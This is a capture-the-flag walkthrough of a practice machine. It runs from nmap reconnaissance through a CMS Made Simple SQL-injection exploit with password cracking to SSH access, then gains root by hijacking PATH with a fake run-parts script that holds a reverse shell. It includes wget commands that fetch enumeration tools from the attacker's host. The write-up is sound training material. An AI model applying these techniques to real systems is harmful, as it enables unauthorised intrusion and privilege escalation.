So this box is going to be a challenge if you have done the 4 previous boxes. It use’s a lot of the same methodology as the previous boxes, where you scan and use and exploit to gain a user shell. Getting root on this box is where this box is tricky, it isn’t difficult but it uses a few new methods.

Starting off this box, You will definitely need to be using tmux as you will need a few terminal sessions. I ran 2 of my initial nmap scan.

nmap -Pn -sV 10.10.10.138 -oN svscan

This first nmap scan is just to tell me what ports are visible and there version.

nmap -Pn -sV -sC 10.10.10.138 -oN scscan

I then run the nmap default script scan, which tells me that there is one disallowed entry into robots.txt, Going to the web page for robots.txt it shows me that /writeup/ is disallowed. I am going to browse to it, as it is the only lead I have. When you first go to the web page you can see it has a dos protection so running gobuster or dirbuster is going to get you a timeout.

This page tells us something interesting. The previous page robots.txt told us the page is hand-crafted with vim, and this page tells us it is NOT. So because I have wappalyzer I can view what applications this webpage is using. and If you don’t have it installed you can view the page source.

The view page source gives us some info about the version, so we need to be looking for a 2019 exploit to get into this box.

searchsploit CMS made simple

Searchsploit is exploitdb but on the terminal. once you have found the exploit you want to use getting it on your PC is simple.

searchsploit -m <PATH>

-m stands for mirror with searchsploit. which allows you to get the exploit.

Now to run the exploit.

This exploit comes with a built in password cracker so I gave it the rockyou.txt wordlist from seclists.

While this run’s looking at the source code, we can see how it works. If the exploit doesn’t run you may be missing this termcolor package. You can install it with.

pip install termcolor

Once the exploit finishes we can see we have a username and password. So lets try and ssh into the box.

Awesome, now we have a shell. The next thing that I did was go into the temp directory and run pspy so I can see the running processes and I ssh into the box while pspy is running.

Transferring the scripts is as simple as going into the directory where the scripts are, running this command

python -m SimpleHTTPServer

and then on the shell of jkr we run this command

wget 10.10.14.58:8000/pspy wget 10.10.14.58:8000/LinEnum.sh

Then we need to make sure these can run

chmod +x LinEnum.sh chmod +x pspy

I go ahead and run pspy, and ssh back in

When we log in root runs a file called run-parts. So I want to know where that file is located.

So this is interesting. Run-parts is located in /bin, when I ran echo $PATH it shows us that /usr/local/bin is before /bin. So if I make a file in /usr/local/bin called run-parts, root will run it before running the /bin run-parts when we login via ssh.

so going into /usr/local/bin I make a file using nano called run-parts.

I then make it bash with the #!/bin/bash

and put a bash reverse shell with my IP in it. Make the file executable and we should be good.

Next I set up a netcat listener to allow the connecting.

When I ssh into it again it runs the run-parts and gives me a reverse shell as the root user.

Now explore and get your flags! You’re root!